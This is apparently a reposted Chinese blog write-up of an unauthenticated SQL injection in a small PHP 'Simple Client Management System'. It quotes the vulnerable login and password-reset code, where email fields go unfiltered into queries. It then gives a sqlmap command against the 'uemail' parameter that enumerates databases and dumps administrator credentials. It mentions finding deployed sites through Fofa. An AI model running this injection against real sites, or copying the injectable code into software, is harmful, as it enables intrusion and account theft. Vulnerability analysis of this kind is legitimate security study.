记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Simple Client Management System未授权的注入漏洞

2021-07-02 15:10

0x00简介


    感觉这个是一个比较小众的模版,看了下Fofa搜索的结果,结果只有不多的网站。

    感兴趣的可以自己去分析一下源代码

https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip

0x01:分析与复现


    1、内网搭建查看

2、首页就是一个登陆框,看下代码

<?php session_start();require_once('dbconnection.php');
//Code for Registration if(isset($_POST['signup'])){ $fname=$_POST['fname']; $lname=$_POST['lname']; $email=$_POST['email']; $password=$_POST['password']; $contact=$_POST['contact']; $enc_password=md5($password); $a=date('Y-m-d'); $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno,posting_date) values('$fname','$lname','$email','$enc_password','$contact','$a')");if($msg){ echo "<script>alert('Register successfully');</script>";}}
// Code for login systemif(isset($_POST['login'])){$password=$_POST['password'];$dec_password=md5($password);$useremail=$_POST['uemail'];$ret= mysqli_query($con,"SELECT * FROM users WHERE email='$useremail' and password='$dec_password'");$num=mysqli_fetch_array($ret);if($num>0){$extra="welcome.php";$_SESSION['login']=$_POST['uemail'];$_SESSION['id']=$num['id'];$_SESSION['name']=$num['fname'];$host=$_SERVER['HTTP_HOST'];$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');header("location:http://$host$uri/$extra");exit();}else{echo "<script>alert('Invalid username or password');</script>";$extra="index.php";$host = $_SERVER['HTTP_HOST'];$uri = rtrim(dirname($_SERVER['PHP_SELF']),'/\\');header("location:http://$host$uri/$extra");exit();}}
//Code for Forgot Password
if(isset($_POST['send'])){$row1=mysqli_query($con,"select email,password from users where email='".$_POST['femail']."'");$row2=mysqli_fetch_array($row1);if($row2>0){$email = $row2['email'];$subject = "Information about your password";$password=$row2['password'];$message = "Your password is ".$password;mail($email, $subject, $message, "From: $email");echo "<script>alert('Your Password has been sent Successfully');</script>";}else{echo "<script>alert('Email not register with us');</script>"; }}
?><!DOCTYPE html><html><head><title>Login System</title><link href="css/style.css" rel='stylesheet' type='text/css' /><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="Elegent Tab Forms,Login Forms,Sign up Forms,Registration Forms,News latter Forms,Elements"./><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script></script><script src="js/jquery.min.js"></script><script src="js/easyResponsiveTabs.js" type="text/javascript"></script> <script type="text/javascript"> $(document).ready(function () { $('#horizontalTab').easyResponsiveTabs({ type: 'default', width: 'auto', fit: true }); });</script><link href='http://fonts.googleapis.com/css?family=Source+Sans+Pro:200,400,600,700,200italic,300italic,400italic,600italic|Lora:400,700,400italic,700italic|Raleway:400,500,300,600,700,200,100' rel='stylesheet' type='text/css'><link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous"></head><body><div class="main"> <div class="facts" style="margin-top: 100px;margin-left: 20%;margin-right: 20%;" align="center"> <div class="login"> <h2 style="color: #fff;">Users Login here</h2> <form name="login" action="" method="post"> <input type="text" class="text" name="uemail" value="" placeholder="Enter your registered email" ><a href="#" class=" icon email"></a>
<input type="password" value="" name="password" placeholder="Enter valid password"><a href="#" class=" icon lock"></a>
<div class="p-container" style="margin-right: 48px;"> <div class="submit two"> <input type="submit" name="login" value="LOG IN" > </div> <div class="clear"> </div> </div>
</form> </div> </div> </div>
</body></html>

3、查看其中登陆所需要输入的uemail参数


这里没有过滤,跟踪一下 确认一下

4、直接到dbconnection.php文件

5、再看下dbconnection.php文件

What???

(黑人抬棺音乐响起)

6、登陆抓包测试

7、sqlmap 制定参数测试

sqlmap -r /Users/apple/Desktop/log.log --dbs --random-agent -p uemail --flush-session

最后的跑数据测试

避免误报

确认无误了

看下权限

看下管理员的账户密码


0x02:总结


    1、这个模版比较简单,我也是萌新,分析有错的话,大佬勿喷

    2、在这个EXP满天飞的时代,想真的学习的话,还真的需要看下漏洞的原理的。

    3、我是萌新,我今天下午1点30分23秒才学习的网络安全,大佬们带带我。


扫码二维码

获取更多精彩

洛米唯熊





点个在看 你最好看




知识来源: https://mp.weixin.qq.com/s?__biz=MzIzODE0NDc3OQ==&mid=2247485142&idx=1&sn=3ef8d948063b1b8640b20ca715bb330d

阅读:39091 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Simple Client Management System未授权的注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云